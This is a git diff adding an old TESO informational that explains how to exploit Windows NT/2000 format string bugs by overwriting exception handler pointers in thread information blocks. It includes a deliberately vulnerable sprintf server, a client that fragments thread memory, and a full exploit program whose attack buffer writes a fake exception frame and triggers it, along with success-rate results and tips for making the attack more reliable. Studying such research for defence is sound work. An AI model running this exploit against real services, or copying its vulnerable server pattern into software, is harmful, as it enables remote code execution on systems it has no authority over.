summaryrefslogtreecommitdiff
path: root/informationals/teso-i0034.txt
diff options
context:
space:
mode:
Diffstat (limited to 'informationals/teso-i0034.txt')
-rw-r--r--informationals/teso-i0034.txt491
1 files changed, 491 insertions, 0 deletions
diff --git a/informationals/teso-i0034.txt b/informationals/teso-i0034.txt
new file mode 100644
index 0000000..686312c
--- /dev/null
+++ b/informationals/teso-i0034.txt
@@ -0,0 +1,491 @@
10034 2001/02/25 advanced way to more reliably exploit NT format bugs remotely
2==== TESO Informational =======================================================
3This piece of information is to be kept confidential.
4===============================================================================
5
6Description ..........: way of getting control with format string bugs
7Date .................: 2000/12/28 06:00
8Author ...............: halvar
9Publicity level ......: unknown
10Affected .............: NT/Win32 specific
11Type of entity .......: NT internals
12Type of discovery ....: useful information
13Severity/Importance ..: n/a
14Found by .............: halvar
15
16===============================================================================
17
18We all know and love format string bugs. Especially on closed-source platforms,
19then can still be found in large numbers. Unfortunately, the really interesting
20affected programs under NT run multi-threaded, making it relatively hard to
21reliably get execution under our control as we cannot overwrite addresses on
22the stack. Under Win2k, a watchdog will restart the service once it dies, so
23if we are first to connect to it after the restart we can reliably guess what
24to overwrite. Under NT, no watchdog is around, so you have only one shot to
25get control.
26
27Now, the other choice that we have is an import table overwrite, which will not
28always work either as apparently many compilers set the import address table
29inside the code section, making it a read-only page once it has been filled by
30the OS. Writing to it will result in a GPF.
31
32This informational will play around with a new cool way of getting control of
33our thread by a yet-unknown technique called "TIB Exception Structure
34Overwrite" (TESO) :-P.
35
36In my last informational (0033) I described a way to walk from the pointer at
37fs:[0] through the exception structures until I have found a function inside
38KERNEL32.DLL. This time, I will play with structured exception handling again,
39so it is a good idea to have absorbed some information from the last informat-
40ional.
41
42Every thread that is created has a structure called "Thread Information Block"
43(TIB) mapped at fs:[0]. (Some people call it "Thread Exception Block", and the
44Wine project has a pretty good/slightly errant documentation of it in thread.h)
45The first DWORD of this structure is a pointer to an __EXCEPTION_FRAME
46structure, which consists of two pointers: One to the next
47__EXCEPTION_FRAME, and one to the function that is supposed to
48handle any exception that occurs. Now, the trick is to create a fake exception
49handling structure in memory and then to overwrite as many TIB entries as we
50can until we trigger an exception. When that exception is triggered, our fake
51exception handling structure will lead to control being transferred to the
52code we pointed to in our structure.
53
54What we have to do in our format string is:
55
561. Create a fake exception handling structure somewhere in memory. This
57means we either have to know an address at which a pointer to a buffer we
58control lies or we have to write a pointer to a buffer we control into
59memory at some point.
60
612. Start overwriting TIB's, starting with the first thread, then the second
62etc. until there are no more threads and our attempts to write to a nonpaged
63section of memory will lead to an exception.
64
653. The exception will transfer control to our exceptionhandler (the buffer
66we control) in which we can then execute code.
67
68Problem Nr 1: We cannot write to any location outside of our current data
69segment, how the hell are we going to write to fs:[0] ?
70
71Answer: The TIB is mapped into the data/code segment as well, at an address
72pointed to by fs:[0x18]. I ran a few tests on a few systems from NT4 SP5 up
73to Win2k SP1 and one could foresee certain regularities between all these
74systems that allow us to reliably tell where the TIB of a certain thread
75will be in regular memory.
76The regularity in TIB allocation follows here:
77The first thread of an application always has his TIB mapped at 0x7FFDE000,
78and up until the 11th thread (which lies at 0x7FFD4000) we have single page
79decrements from the initial value (-0x1000). Then we have a rather odd gap,
80and the 12th threads TIB will be located at 0x7FFAF000. All subsequent
81threads will have their TIB allocated sequentally with (-0x1000) difference
82from here on, up until thread 250 where I stopped testing :-)
83
84Problem Nr 2: We cannot easily write to addresses containing NULL bytes,
85and we cannot assure that the location (TIB)-1 will be paged.
86What can we do here ?
87
88Answer: Not much. This is one of the major drawbacks of this approach.
89The problem lies in a form of memory fragmentation that occurs like this:
90Several threads are created, and their TIBs are paged into the CS/DS acc-
91ording to the rules outlined before. Now, some of these threads will exit
92again and their respective TIB-pages will be freed; this can lead to
93a memory layout somewhat like this:
94
95[0x7FFDE000 -- paged]
96[0x7FFDD000 -- nonpaged]
97[0x7FFDC000 -- nonpaged]
98[0x7FFDB000 -- paged]
99[0x7FFDA000 -- paged]
100[0x7FFD9000 ... nonpaged from here on]
101
102Now we can see that we get into trouble as we will trigger an exception
103after having overwritten the first exception handler, without touching
104the other two handlers we would need to overwrite.
105
106Now the trick is that as soon as new threads are created, their TIBs are
107paged into these gaps. So what we can do is to create our thread that
108will execute the format string bug, and then, before we actually execute
109the vulnerable code, create a lot of arbitrary threads, hopefully enough
110to fill all gaps. We can then sequentally overwrite the exception handlers
111and trigger an exception to gain control.
112
113Problem Nr 3:
114While experimenting with exceptionhandlers for a while I found out that
115apparently NT wants the pointer at fs:[0] to point somewhere between the
116"stack bottom" and the "stack top" of the offending thread.
117(For those interested, that validation happens in a function called
118RtlDispatchException() which is a called by KiUserExceptionDispatcher)
119If the pointer points elsewhere the user-installed exception handler will
120not be called; an exception called EXCEPTION_INVALID_DISPOSITION will be
121raised instead.
122
123Answer:
124Since we clearly cannot write an EXCEPTION_FRAME for each thread into its
125stack region we need a different solution. Looking at thread.h from the
126WINE project, we can see that the stack_top and stack_low variables are
127stored at fs:[4] and fs:[8] respectively. Now this implies that we can
128easily alter the range in which our EXCEPTION_FRAME can be created. So
129what we'll need to do in addition to overwriting the pointer at fs:[0] is
130to overwrite the stack_top variables high-order byte with 0x7F, thus mak-
131ing sure that we pass the tests inside RtlDispatchException and praying
132that we don't fuck anything up so badly that it'll crash NT :)
133The EXCEPTION_FRAME has to be created somewhere above stack_low in memory
134then. For my example, I will construct it inside MSVCRT.DLL's data segment.
135
136Here follows the code (I compiled stuff with BC++; I am not sure how stuff
137looks when a different compiler works his magic, so you'll probably need
138some tweaking.):
139
140---- snip ---- lameserver.c -------
141#include <stdio.h>
142#include <stdlib.h>
143#include <windows.h>
144#include <winsock.h>
145
146unsigned long __stdcall NewThread(void *singlearg)
147{
148 int sock, blah;
149 char lame2[5000],lame[3000];
150
151 sock = (int)singlearg;
152 blah = recv(sock, lame, sizeof(lame)-1, 0);
153 if(blah != -1)
154 {
155 lame[blah] = 0; // NULL-terminate
156 sprintf(lame2, lame);
157 printf("%s\n", lame2);
158 }
159
160 send(sock, lame2, strlen(lame2), 0);
161 Sleep(500);
162 closesocket(sock);
163 ExitThread(1);
164}
165
166int main(int argc, char **argv)
167{
168 WSADATA WSAdat;
169 struct sockaddr_in Host;
170 int idThread;
171 SOCKET sock1;
172
173 WSAStartup(0x101, &WSAdat); // Startup the sockets interface
174 Host.sin_family = AF_INET;
175 Host.sin_addr.s_addr = 0;
176 Host.sin_port = htons(999);
177 sock1 = socket(AF_INET, SOCK_STREAM, 0);
178 bind(sock1, (struct sockaddr *)&Host, sizeof(struct sockaddr_in));
179 while(1)
180 {
181 listen(sock1, 0x3);
182 printf("Waiting for connection\n");
183 CreateThread(NULL, 0, &NewThread, (void *)accept(sock1, NULL, NULL), 0, &idThread);
184 }
185}
186----- snip ---- lameserver.c EOF
187
188The server will wait for an incoming connection and spawn a new thread. For each
189connection the thread will read a string from the network, feed it into sprintf()
190to create something format-string-buggish and then echo it back to the client. It
191will then disconnect and kill the thread it just created.
192
193----- snip ---- lameclient.c --------
194#include <stdio.h>
195#include <stdlib.h>
196#include <windows.h>
197#include <winsock.h>
198
199#define MAX_THREAD_NORMAL 20
200#define MAX_THREAD_LINGER 10
201
202int ThreadCount = MAX_THREAD_NORMAL;
203int ThreadLinger = MAX_THREAD_LINGER;
204
205void NewThread(void *singlearg)
206{
207 int sock, iLinger;
208 struct sockaddr_in Host;
209 unsigned long rndval;
210
211 iLinger = 0; // zero the var
212
213 if((GetTickCount() & 0xF) > 13) // set a certain frequency for lingering
214 { // connections
215 Sleep(0);
216 if(ThreadLinger > 0)
217 {
218 ThreadLinger--;
219 rndval = 0xFFFF;
220 iLinger = 1; // set iLinger to TRUE
221 }
222 }
223
224 if(iLinger == 0)
225 {
226 Sleep(0);
227 rndval = GetTickCount() & 0xFF;
228 Sleep(0);
229 rndval *= (GetTickCount() & 0x7F);
230 }
231 printf("[%lx] Connecting with a wait time of %ld ms -- ThreadCount is %ld \n", singlearg, rndval, MAX_THREAD_NORMAL-ThreadCount-1);
232
233 sock = socket(AF_INET, SOCK_STREAM, 0);
234 Host.sin_family = AF_INET;
235 Host.sin_addr.s_addr = 0x0100007F; // 127.0.0.1
236 Host.sin_port = htons(999);
237
238 connect(sock, (struct sockaddr *)&Host, sizeof(Host));
239 Sleep(rndval);
240 printf("[%lx] Exiting...\n", singlearg);
241 closesocket(sock);
242 ThreadCount++;
243 if(iLinger)
244 ThreadLinger++;
245
246 ExitThread(0);
247}
248
249int main(int argc, char **argv)
250{
251 WSADATA wsaDat;
252 int idThread;
253
254 idThread = 0;
255
256 WSAStartup(0x101, &wsaDat);
257 while(1)
258 {
259 if(ThreadCount > 0)
260 {
261 ThreadCount--;
262 Sleep(GetTickCount() & 0x3FF);
263 CreateThread(NULL, 0, &NewThread, (void *)idThread, 0, &idThread);
264 }
265 else
266 Sleep(GetTickCount() & 0x3FFF);
267 }
268}
269----- snip ---- lameclient.c EOF
270
271This lame piece of crap multithreaded client will create a bunch of threads
272which will connect to our lame server, keep a connection open for a certain
273random time and then close the connection again. A few lingering connections
274are around that take a bit longer to finish. As soon as the maximum number
275of threads is reached, the client will pause for a while, letting a bunch of
276threads die again. This is pretty good to simulate the fragmentation in
277memory in case the connection count on the server is receding.
278An example of fragmented memory just after the connection count dropped from
27929 to 17 is here:
280
281001B:7FFDE000 0012FD50 00130000 0012E000 00000000 P...............
282001B:7FFDD000 0538FFDC 05390000 0538F000 00000000 ..8...9...8.....
283001B:7FFDC000 00E8FBF8 00E90000 00E8F000 00000000 ................
284001B:7FFDB000 00F8FBF8 00F90000 00F8F000 00000000 ................
285001B:7FFDA000 ???????? ???????? ???????? ???????? fragmented :-)
286001B:7FFD9000 0168FBF8 01690000 0168F000 00000000 ..h...i...h.....
287001B:7FFD8000 0178FBF8 01790000 0178F000 00000000 ..x...y...x.....
288001B:7FFD7000 ???????? ???????? ???????? ???????? fragmented :-)
289001B:7FFD6000 04C8FBF8 04C90000 04C8F000 00000000 ................
290001B:7FFD5000 0398FBF8 03990000 0398F000 00000000 ................
291001B:7FFD4000 0438FBF8 04390000 0438F000 00000000 ..8...9...8.....
292001B:7FFAF000 ???????? ???????? ???????? ???????? fragmented :-)
293001B:7FFAE000 0208FBF8 02090000 0208F000 00000000 ................
294001B:7FFAD000 0218FBF8 02190000 0218F000 00000000 ................
295001B:7FFAC000 ???????? ???????? ???????? ???????? fragmented :-)
296001B:7FFAB000 ???????? ???????? ???????? ???????? fragmented :-)
297001B:7FFAA000 0308FBF8 03090000 0308F000 00000000 ................
298001B:7FFA9000 ???????? ???????? ???????? ???????? fragmented :-)
299001B:7FFA8000 0318FBF8 03190000 0318F000 00000000 ................
300001B:7FFA7000 ???????? ???????? ???????? ???????? fragmented :-)
301001B:7FFA6000 ???????? ???????? ???????? ???????? fragmented :-)
302001B:7FFA5000 04D8FBF8 04D90000 04D8F000 00000000 ................
303001B:7FFA4000 ???????? ???????? ???????? ???????? fragmented :-)
304001B:7FFA3000 04A8FBF8 04A90000 04A8F000 00000000 ................
305001B:7FFA2000 0528FBF8 05290000 0528F000 00000000 ................
306001B:7FFA1000 04B8FBF8 04B90000 04B8F000 00000000 ................
307
308Now, what our exploit needs to do is:
309
3101. Connect to the server to create a thread that will later send the
311format string.
3122. Connect to the server with a bunch of more threads to fill in as many
313gaps as possible to "defragment" the memory.
3143. The first created thread will now start to write to the exception
315handlers and then trigger an exception. In order to pass the checks inside
316KiUserExceptionDispatcher() we have to overwrite the highest-order byte
317of the stack_top variable located at fs:7 as well.
318
319The code for this follows right here :)
320
321---- snip --- sploit.c
322#include <stdio.h>
323#include <stdlib.h>
324#include <windows.h>
325#include <winsock.h>
326
327/*
328What we want to do with the format string is this:
329Write 0x78038010 to location 0x78038004; then write an INT3 to 0x78038010,
330then write 0x78038000 to the exception handlers until we hit an exception...
331*/
332
333
334unsigned char szAttackBuffer[] = {
335"\x04\x80\x03\x78%12c%n " // Create ptr to our code
336"\x05\x80\x03\x78%c%105c%n "
337"\x06\x80\x03\x78%.f%123c%n "
338"\x07\x80\x03\x78%.f%65c%n "
339
340"\x10\x80\x03\x78%.f%76c%n%51c%.f" // Create a single 0xCC as "payload"
341
342//--- First Thread
343"\x07\xE0\xFD\x7F%123c%n%c%c " // set the stack top to 0x7F120000 ;>
344"\x01\xE0\xFD\x7F%250c%n " // write 0x80 to byte 2 of xcpt frame *
345"\x02\xE0\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3 of xcpt frame *
346"\x03\xE0\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
347"\xFD\xDF\xFD\x7F%c%n%128c%c " // write 0x00 to byte 1 and pad to 00
348//--- Second Thread
349"\x07\xD0\xFD\x7F%123c%n%c%c " // set stack top to 0x7Fxxxxxx :)
350"\x01\xD0\xFD\x7F%250c%n " // write 0x80 to byte 2
351"\x02\xD0\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3
352"\x03\xD0\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
353"\xFD\xCF\xFD\x7F%c%n%128c%c " // write 0x00 to byte 1 and pad to 00
354//--- Third Thread
355"\x07\xC0\xFD\x7F%123c%n%c%c " // set stack top to 0x7Fxxxxxx :)
356"\x01\xC0\xFD\x7F%250c%n " // write 0x80 to byte 2
357"\x02\xC0\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3
358"\x03\xC0\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
359"\xFD\xBF\xFD\x7F%c%n%128c%c " // write 0x00 to byte 1 and pad to 00
360//--- Fourth Thread
361"\x07\xB0\xFD\x7F%123c%n%c%c " // set stack top to 0x7Fxxxxxx :)
362"\x01\xB0\xFD\x7F%250c%n " // write 0x80 to byte 2
363"\x02\xB0\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3
364"\x03\xB0\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
365"\xFD\xAF\xFD\x7F%c%n%128c%c " // write 0x00 to byte 1 and pad to 00
366//--- Fifth Thread
367"\x07\xA0\xFD\x7F%123c%n%c%c " // set stack top to 0x7Fxxxxxx :)
368"\x01\xA0\xFD\x7F%250c%n " // write 0x80 to byte 2
369"\x02\xA0\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3
370"\x03\xA0\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
371"\xFD\x9F\xFD\x7F%c%n%128c%c " // write 0x00 to byte 1 and pad to 00
372//--- Sixth Thread
373"\x07\x90\xFD\x7F%123c%n%c%c " // set stack top to 0x7Fxxxxxx :)
374"\x01\x90\xFD\x7F%250c%n " // write 0x80 to byte 2
375"\x02\x90\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3
376"\x03\x90\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
377"\xFD\x8F\xFD\x7F%c%n%128c%c " // write 0x00 to byte 1 and pad to 00
378//--- Seventh Thread
379"\x07\x80\xFD\x7F%123c%n%c%c " // set stack top to 0x7Fxxxxxx :)
380"\x01\x80\xFD\x7F%250c%n " // write 0x80 to byte 2
381"\x02\x80\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3
382"\x03\x80\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
383"\xFD\x7F\xFD\x7F%c%n%128c%c " // write 0x00 to byte 1 and pad to 00
384//--- Eight Thread
385"\x07\x70\xFD\x7F%123c%n%c%c " // set stack top to 0x7Fxxxxxx :)
386"\x01\x70\xFD\x7F%250c%n " // write 0x80 to byte 2
387"\x02\x70\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3
388"\x03\x70\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
389"\xFD\x6F\xFD\x7F%c%n%128c%c " // write 0x00 to byte 1 and pad to 00
390//--- Ninth Thread
391"\x07\x60\xFD\x7F%123c%n%c%c " // set stack top to 0x7Fxxxxxx :)
392"\x01\x60\xFD\x7F%250c%n " // write 0x80 to byte 2
393"\x02\x60\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3
394"\x03\x60\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
395"\xFD\x5F\xFD\x7F%c%n%128c%c " // write 0x00 to byte 1 and pad to 00
396//--- Tenth Thread
397"\x07\x50\xFD\x7F%123c%n%c%c " // set stack top to 0x7Fxxxxxx :)
398"\x01\x50\xFD\x7F%250c%n " // write 0x80 to byte 2
399"\x02\x50\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3
400"\x03\x50\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
401"\xFD\x4F\xFD\x7F%c%n%128c%c " // write 0x00 to byte 1 and pad to 00
402//--- Eleventh Thread
403"\x07\x40\xFD\x7F%123c%n%c%c " // set stack top to 0x7Fxxxxxx :)
404"\x01\x40\xFD\x7F%250c%n " // write 0x80 to byte 2
405"\x02\x40\xFD\x7F%125c%c%n%c " // write 0x03 to byte 3
406"\x03\x40\xFD\x7F%c%110c%n%.f" // write 0x78 to byte 4
407"\xFD\x3F\xFD\x7F%c%n%n" // write 0x00 to byte 1 and trigger xception
408};
409
410int main(int argc, char **argv)
411{
412 WSADATA wsaDat;
413 struct sockaddr_in Host;
414 int sock, socks[10], i;
415
416 WSAStartup(0x101, &wsaDat);
417
418 Host.sin_family = AF_INET;
419 Host.sin_addr.s_addr = 0x0100007F;
420 Host.sin_port = htons(999);
421
422 sock = socket(AF_INET, SOCK_STREAM, 0);
423 connect(sock, (struct sockaddr *)&Host, sizeof(Host)); // create attack
424 // thread
425 for(i = 1; i < 11; i++)
426 {
427 socks[i] = socket(AF_INET,SOCK_STREAM, 0);
428 connect(socks[i], (struct sockaddr *)&Host, sizeof(Host));
429 }
430 Sleep(50);
431 send(sock, szAttackBuffer, strlen(szAttackBuffer), 0);
432}
433----- snip --- sploit.c EOF
434
435Now, we run into a few small limitations of our compilers snprintf()-function,
436apparently the runtime of BC++ will not allow us to have too long output, so
437we cannot overwrite more than 10 exception handlers in the current setup.
438(This number can be optimized by choosing better addresses for the EXCEPTION_
439FRAME structure and by optimizing the writing process where possible).
440Therefore, under really heavy load (dozens of threads active at one time)
441one might want to create multiple threads which overwrite different subsets
442of the TIBs a time. This is up to the attackers creativity, I am not going
443to play through every possible situation here.
444
445Testrun: The above examples were used for 11 trial runs (don't ask why).
446(Remember, 10 of the threads in the process are _our_ threads, so de-facto
447load of the server without our intervention is the value in brackets)
448
449Try No #1 Threads in Process Address of thread TIB Status ?
450 1 19(9) 0x7FFDD000 SUCCESS
451 2 21(11) 0x7FFDC000 SUCCESS
452 3 28(18) 0x7FFDD000 SUCCESS
453 4 27(17) 0x7FFD5000 SUCCESS
454 5 18(8) 0x7FFDD000 SUCCESS
455 6 29(19) 0x7FFA6000 FAILURE
456 7 24(14) 0x7FFDB000 SUCCESS
457 8 27(17) 0x7FFD6000 SUCCESS
458 9 31(21) 0x7FFA7000 FAILURE
459 10 30(20) 0x7FFA6000 FAILURE
460 11 25(15) 0x7FFD6000 SUCCESS
461
462Now, for a server with a load between 8-21 threads (as the example program
463lameserver.c and lameclient.c create) the example exploit will yield decent
464results with an exploitation reliability of about 72%. (Yes I know I need
465more test results to make reliable assumptions about reliability ! :)
466
467The fun part is that
468this will work against any SP of NT/2k known to me and will even work if the
469binaries in memory are different from those expected in the exploit (assuming
470the writable area where we create the EXCEPTION_FRAME stays writable).
471In fact you have to know very little in order to have a pretty decent proba-
472bility of succeeding. But keep in mind its only a propability, and this is
473not the nice 80's style single-thread process-only exploitation most people
474are used to.
475
476Possible ways to improve the probability for success (up to the reader to
477actually try out :)
4781. Try to use multiple threads to overwrite a larger number of EXCEPTION_FRAME
479pointers and keeping the thread alive afterwards.
4802. The worse the memory is fragmented, the better our chances to get our main
481exploiting thread to be among the first 10 in memory. So creating memory frag-
482mentation works for us -- try creating a heavy server load with 30-40 threads,
483then let them all die quickly. Connect immediately afterwards with the main
484exploiting thread.
485
486Ok, Tuesday night, 3 o'clock in the morning. Time for bed. Stay tooned for my
487next informational presenting yet another leeto Win32 fmt bug exploitation
488technique: UEFA (Unhandled Exception Filter Attack) :)
489
490===============================================================================
491